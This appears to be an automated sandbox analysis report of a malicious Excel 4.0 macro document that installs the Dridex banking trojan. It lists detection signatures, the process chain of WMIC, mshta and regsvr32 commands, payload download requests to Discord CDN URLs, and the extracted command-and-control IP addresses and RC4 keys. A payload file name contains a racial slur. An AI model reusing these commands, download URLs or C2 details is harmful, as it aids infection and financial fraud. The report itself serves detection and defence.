Loading ...

Play interactive tourEdit tour

Windows Analysis Report Results12232021.xls

Overview

General Information

Sample Name:Results12232021.xls
Analysis ID:544578
MD5:8d1d1df2277e8730eee7de7fe28f60e1
SHA1:773b3ff48428bdacf2afeb7fc9fd1261a2e0591c
SHA256:4d21115441459063cf8403f94d3bb37201666be30622cb2cb4e2ffb32827192f
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found malicious Excel 4.0 Macro
Document contains OLE streams with names of living off the land binaries
Tries to delay execution (extensive OutputDebugStringW loop)
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Regsvr32 Command Line Without DLL
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Yara detected hidden Macro 4.0 in Excel
Contains functionality to create processes via WMI
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious WMI Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Entry point lies outside standard sections
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2796 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 572 cmdline: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 1500 cmdline: mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
    • WMIC.exe (PID: 960 cmdline: wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin" MD5: FD902835DEAEF4091799287736F3A028)
  • regsvr32.exe (PID: 2692 cmdline: regsvr32.exe -s C:\\ProgramData\fvfnigger.bin MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2564 cmdline: -s C:\\ProgramData\fvfnigger.bin MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Results12232021.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x66031:$s1: Excel
  • 0x66054:$s1: Excel
  • 0x2478:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Results12232021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\Results12232021.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x66031:$s1: Excel
    • 0x66054:$s1: Excel
    • 0x2478:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\Results12232021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.1118714638.0000000072A61000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.2.regsvr32.exe.72a60000.8.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf, CommandLine: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf, CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2796, ProcessCommandLine: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf, ProcessId: 572
          Sigma detected: Regsvr32 Command Line Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\\ProgramData\fvfnigger.bin, CommandLine: -s C:\\ProgramData\fvfnigger.bin, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32.exe -s C:\\ProgramData\fvfnigger.bin, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2692, ProcessCommandLine: -s C:\\ProgramData\fvfnigger.bin, ProcessId: 2564
          Sigma detected: Suspicious WMI ExecutionShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf, CommandLine: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf, CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2796, ProcessCommandLine: C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf, ProcessId: 572

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 11.2.regsvr32.exe.72a60000.8.unpackMalware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Results12232021.xlsReversingLabs: Detection: 20%
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: regsvr32.exe, 0000000B.00000003.593737070.000000007DE80000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593142361.0000000002700000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593332634.0000000002850000.00000004.00000001.sdmp
          Source: Binary string: RFFGTEQ.pdb source: mshta.exe, 00000005.00000003.581516518.0000000006934000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121978268.0000000005D10000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.581607342.00000000069BE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1122012753.0000000006000000.00000004.00000001.sdmp, fvfnigger.bin.5.dr, WIvRRHIemuhammadismyfriend[1].bin.5.dr

          Software Vulnerabilities:

          barindex
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
          Source: global trafficDNS query: name: cdn.discordapp.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorIPs: 144.91.122.102:443
          Source: Malware configuration extractorIPs: 85.10.248.28:593
          Source: Malware configuration extractorIPs: 185.4.135.27:5228
          Source: Malware configuration extractorIPs: 80.211.3.13:8116
          Source: Joe Sandbox ViewASN Name: TOPHOSTGR TOPHOSTGR
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Joe Sandbox ViewIP Address: 185.4.135.27 185.4.135.27
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: global trafficHTTP traffic detected: GET /attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com.1 equals www.linkedin.com (Linkedin)
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: WMIC.exe, 00000003.00000002.576396153.0000000001BC0000.00000002.00020000.sdmp, WMIC.exe, 00000008.00000002.585430316.0000000001C00000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117795562.0000000001C60000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1117736563.0000000000800000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: regsvr32.exe, 0000000B.00000002.1118809244.0000000072A7F000.00000002.00020000.sdmpString found in binary or memory: http://www.baxleystamps.comDVarFileInfo$
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/
          Source: mshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509168294461500/rebXcmuhammadismyfriend
          Source: mshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509241996795935/iivKjRymuhammadismyfrie
          Source: mshta.exe, 00000005.00000002.1121286244.0000000004EF5000.00000004.00000040.sdmp, mshta.exe, 00000005.00000003.582502016.00000000002FD000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfri
          Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].binJump to behavior
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud:

          barindex
          Yara detected Dridex unpacked fileShow sources
          Source: Yara matchFile source: 11.2.regsvr32.exe.72a60000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1118714638.0000000072A61000.00000020.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 8Screenshot OCR: enable content button above 4 5 6 7 8 m :0 = 11 12 lj 13 14 , d omn 15 16 17 18 wm
          Found malicious Excel 4.0 MacroShow sources
          Source: Results12232021.xlsMacro extractor: Sheet: Macro1 contains: ShellExecuteA
          Source: Results12232021.xlsMacro extractor: Sheet: Macro1 contains: ShellExecuteA
          Document contains OLE streams with names of living off the land binariesShow sources
          Source: Results12232021.xlsStream path 'Workbook' : ........| ..........................\.p....user B.....=.....................=........J..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"#,##0_);\("$"#,##0\)..!......"$"#,##0_);[Red]\("$"#,##0\).."......"$"#,##0.00_);\("$"#,##0.00\)..'...".."$"#,##0.00_);[Red]\("$"#,##0.00\)..7.*.2.._("$"* #,##0_);_("$"* \(#,##0\);_("$"* "-"_);_(@_)....).).._(* #,##0_);_(* \(#,##0\);_(* "-"_);_(@_)..?.,.:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_)..6.+.1.._(* #,##0.00_);_(* \(#,##0.00\);_(* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...........* .......... ............ .......... .........../ .......... ............ .......... ...........+ .......... ............ .......... ............ .......... ..........., .......... .........../ .......... ............ .......... .........../ .......... ............ .......... ............ .......... ...........1 .......... ...........5 .......... ...........7 .......... ...........3 .......... ...........6 .......... ...........9 .......... ...........- .......... ............ .......... ...ff......7 ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ...........* .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... .........../ .......... ....`....... .......... ...........+ .......... ............ .......... ............ .......... ............ .......... ............ .......... ....a....... .......... ............ .........."............ ....
          Source: Results12232021.xls.0.drStream path 'Workbook' : ........| ..........................\.p....user B.....=.....................=........J..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"#,##0_);\("$"#,##0\)..!......"$"#,##0_);[Red]\("$"#,##0\).."......"$"#,##0.00_);\("$"#,##0.00\)..'...".."$"#,##0.00_);[Red]\("$"#,##0.00\)..7.*.2.._("$"* #,##0_);_("$"* \(#,##0\);_("$"* "-"_);_(@_)....).).._(* #,##0_);_(* \(#,##0\);_(* "-"_);_(@_)..?.,.:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_)..6.+.1.._(* #,##0.00_);_(* \(#,##0.00\);_(* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...........* .......... ............ .......... .........../ .......... ............ .......... ...........+ .......... ............ .......... ............ .......... ..........., .......... .........../ .......... ............ .......... .........../ .......... ............ .......... ............ .......... ...........1 .......... ...........5 .......... ...........7 .......... ...........3 .......... ...........6 .......... ...........9 .......... ...........- .......... ............ .......... ...ff......7 ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ...........* .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... .........../ .......... ....`....... .......... ...........+ .......... ............ .......... ............ .......... ............ .......... ............ .......... ....a....... .......... ............ .........."............ ....
          Found abnormal large hidden Excel 4.0 Macro sheetShow sources
          Source: Results12232021.xlsMacro extractor: Sheet name: Macro1 size: 5221
          Source: Results12232021.xlsMacro extractor: Sheet name: Macro1 size: 5221
          Found Excel 4.0 Macro with suspicious formulasShow sources
          Source: Results12232021.xlsInitial sample: EXEC
          Source: Results12232021.xlsInitial sample: EXEC
          Contains functionality to create processes via WMIShow sources
          Source: WMIC.exe, 00000003.00000002.576163070.0000000000330000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf"C:\Windows\System32\wbem\WMIC.exeWinSta0\Default
          Source: Results12232021.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
          Source: C:\Users\user\Desktop\Results12232021.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A70730
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A79370
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A61494
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A6A4E8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A68428
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A7143C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A72234 NtDelayExecution,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A72820 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A73294 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A6BB44 NtClose,
          Source: 649C.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
          Source: Results12232021.xlsMacro extractor: Sheet name: Macro1
          Source: Results12232021.xlsMacro extractor: Sheet name: Macro1
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: Results12232021.xlsOLE indicator, VBA macros: true
          Source: Results12232021.xls.0.drOLE indicator, VBA macros: true
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
          Source: Results12232021.xlsReversingLabs: Detection: 20%
